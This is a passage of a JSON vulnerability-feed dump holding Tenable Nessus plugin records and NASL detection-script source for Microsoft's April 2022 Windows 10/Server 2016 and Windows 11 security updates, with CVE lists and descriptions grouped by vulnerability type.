CVE-2022-24481, CVE-2022-24479, CVE-2022-24527, CVE-2022-24474, CVE-2022-24521, CVE-2022-24547, CVE-2022-24550, CVE-2022-24499, CVE-2022-24494, CVE-2022-24542, CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26831, CVE-2022-26915, CVE-2022-24538, CVE-2022-24484, CVE-2022-26784)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-26823, CVE-2022-26812, CVE-2022-26919, CVE-2022-26811, CVE-2022-26809, CVE-2022-26918, CVE-2022-26917, CVE-2022-26813, CVE-2022-26826, CVE-2022-26824, CVE-2022-26815, CVE-2022-26814, CVE-2022-26916, CVE-2022-26822, CVE-2022-26829, CVE-2022-26820, CVE-2022-26819, CVE-2022-26818, CVE-2022-26825, CVE-2022-26817, CVE-2022-26821, CVE-2022-24545, CVE-2022-24541, CVE-2022-24492, CVE-2022-24491, CVE-2022-24537, CVE-2022-24536, CVE-2022-24487, CVE-2022-24534, CVE-2022-24485, CVE-2022-24533, CVE-2022-26903, CVE-2022-24495, CVE-2022-24528, CVE-2022-21983, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-26816, CVE-2022-24493, CVE-2022-24539, CVE-2022-24490, CVE-2022-26783, CVE-2022-26785, CVE-2022-24498, CVE-2022-24483)", "cvss3": {}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012596: Windows 10 version 1607 / Windows Server 2016 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-24474", "CVE-2022-24479", "CVE-2022-24481", "CVE-2022-24482", "CVE-2022-24483", "CVE-2022-24484", "CVE-2022-24485", "CVE-2022-24486", "CVE-2022-24487", "CVE-2022-24489", "CVE-2022-24490", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24495", "CVE-2022-24496", "CVE-2022-24497", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24537", "CVE-2022-24538", "CVE-2022-24539", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24545", "CVE-2022-24547", "CVE-2022-24549", "CVE-2022-24550", "CVE-2022-26783", "CVE-2022-26784", "CVE-2022-26785", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26794", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26816", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26827", "CVE-2022-26829", "CVE-2022-26831", "CVE-2022-26832", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012596.NASL", "href": "https://www.tenable.com/plugins/nessus/159677", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159677);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-22008\",\n \"CVE-2022-24474\",\n \"CVE-2022-24479\",\n \"CVE-2022-24481\",\n \"CVE-2022-24482\",\n \"CVE-2022-24483\",\n \"CVE-2022-24484\",\n \"CVE-2022-24485\",\n \"CVE-2022-24486\",\n \"CVE-2022-24487\",\n \"CVE-2022-24489\",\n \"CVE-2022-24490\",\n \"CVE-2022-24491\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24495\",\n \"CVE-2022-24496\",\n \"CVE-2022-24497\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24536\",\n \"CVE-2022-24537\",\n \"CVE-2022-24538\",\n \"CVE-2022-24539\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-24545\",\n \"CVE-2022-24547\",\n \"CVE-2022-24549\",\n \"CVE-2022-24550\",\n \"CVE-2022-26783\",\n \"CVE-2022-26784\",\n \"CVE-2022-26785\",\n \"CVE-2022-26786\",\n \"CVE-2022-26787\",\n \"CVE-2022-26788\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26794\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26808\",\n \"CVE-2022-26809\",\n \"CVE-2022-26810\",\n \"CVE-2022-26811\",\n \"CVE-2022-26812\",\n \"CVE-2022-26813\",\n \"CVE-2022-26814\",\n \"CVE-2022-26815\",\n \"CVE-2022-26816\",\n \"CVE-2022-26817\",\n \"CVE-2022-26818\",\n \"CVE-2022-26819\",\n \"CVE-2022-26820\",\n \"CVE-2022-26821\",\n \"CVE-2022-26822\",\n \"CVE-2022-26823\",\n \"CVE-2022-26824\",\n \"CVE-2022-26825\",\n \"CVE-2022-26826\",\n \"CVE-2022-26827\",\n \"CVE-2022-26829\",\n \"CVE-2022-26831\",\n \"CVE-2022-26832\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\"\n );\n script_xref(name:\"MSKB\", value:\"5012596\");\n script_xref(name:\"MSFT\", value:\"MS22-5012596\");\n script_xref(name:\"IAVA\", value:\"2022-A-0143-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012596: Windows 10 version 1607 / Windows Server 2016 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012591.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-26827, CVE-2022-24549, CVE-2022-26810, \n CVE-2022-26803, CVE-2022-26808, CVE-2022-26807, \n CVE-2022-26792, CVE-2022-26801, CVE-2022-26802, \n CVE-2022-26794, CVE-2022-26790, CVE-2022-26797, \n CVE-2022-26787, CVE-2022-26798, CVE-2022-26796, \n CVE-2022-26786, CVE-2022-26904, CVE-2022-26788, \n CVE-2022-24496, CVE-2022-24544, CVE-2022-24540, \n CVE-2022-24489, CVE-2022-24486, CVE-2022-24481, \n CVE-2022-24479, CVE-2022-24527, CVE-2022-24474, \n CVE-2022-24521, CVE-2022-24547, CVE-2022-24550, \n CVE-2022-24499, CVE-2022-24494, CVE-2022-24542, \n CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-26831, \n CVE-2022-26915, CVE-2022-24538, CVE-2022-24484, \n CVE-2022-26784)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-26823, \n CVE-2022-26812, CVE-2022-26919, CVE-2022-26811, \n CVE-2022-26809, CVE-2022-26918, CVE-2022-26917, \n CVE-2022-26813, CVE-2022-26826, CVE-2022-26824, \n CVE-2022-26815, CVE-2022-26814, CVE-2022-26916, \n CVE-2022-26822, CVE-2022-26829, CVE-2022-26820, \n CVE-2022-26819, CVE-2022-26818, CVE-2022-26825, \n CVE-2022-26817, CVE-2022-26821, CVE-2022-24545, \n CVE-2022-24541, CVE-2022-24492, CVE-2022-24491, \n CVE-2022-24537, CVE-2022-24536, CVE-2022-24487, \n CVE-2022-24534, CVE-2022-24485, CVE-2022-24533, \n CVE-2022-26903, CVE-2022-24495, CVE-2022-24528, \n CVE-2022-21983, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-26816, CVE-2022-24493, \n CVE-2022-24539, CVE-2022-24490, CVE-2022-26783, \n CVE-2022-26785, CVE-2022-24498, CVE-2022-24483)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012596\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5012596\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012596'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'14393',\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012596])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:44:04", "description": "The remote Windows host is missing security update 5012592. It is, therefore, affected by multiple vulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26831 CVE-2022-26915, CVE-2022-23268) \n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-26916, CVE-2022-26917, CVE-2022-26809, CVE-2022-26919, CVE-2022-26830, CVE-2022-26918, CVE-2022-26826, CVE-2022-24545, CVE-2022-24541, CVE-2022-24492, CVE-2022-24491, CVE-2022-24537, CVE-2022-24487, CVE-2022-24534, CVE-2022-24485, CVE-2022-24533, CVE-2022-24495, CVE-2022-24528, CVE-2022-23257, CVE-2022-21983, CVE-2022-22009, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-26920, CVE-2022-24493, CVE-2022-24498, CVE-2022-24483)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. (CVE-2022-26789, CVE-2022-26786, CVE-2022-26802, CVE-2022-26808, CVE-2022-26807, CVE-2022-26795, CVE-2022-26792, CVE-2022-26794, CVE-2022-26904, CVE-2022-26803, CVE-2022-26797, CVE-2022-26787, CVE-2022-24549, CVE-2022-26914, CVE-2022-26801, CVE-2022-26798, CVE-2022-26793, CVE-2022-26796, CVE-2022-26790, CVE-2022-26788, CVE-2022-24496, CVE-2022-24544, CVE-2022-24540, CVE-2022-24488, CVE-2022-24486, CVE-2022-24481, CVE-2022-24479, CVE-2022-24527, CVE-2022-24474, CVE-2022-24521, CVE-2022-24550, CVE-2022-24499, CVE-2022-24547, CVE-2022-24546, CVE-2022-24494, CVE-2022-24542, CVE-2022-24530)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012592: Windows 11 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-22009", "CVE-2022-23257", "CVE-2022-23268", "CVE-2022-24474", "CVE-2022-24479", "CVE-2022-24481", "CVE-2022-24482", "CVE-2022-24483", "CVE-2022-24485", "CVE-2022-24486", "CVE-2022-24487", "CVE-2022-24488", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24495", "CVE-2022-24496", "CVE-2022-24497", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24537", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24545", "CVE-2022-24546", "CVE-2022-24547", "CVE-2022-24549", "CVE-2022-24550", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26789", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26793", "CVE-2022-26794", "CVE-2022-26795", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26826", "CVE-2022-26830", "CVE-2022-26831", "CVE-2022-26904", "CVE-2022-26914", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919", "CVE-2022-26920"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012592.NASL", "href": "https://www.tenable.com/plugins/nessus/159671", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, In

Microsoft Patch Tuesday April 2022 and custom CVE comments sources in Vulristics

Description

Related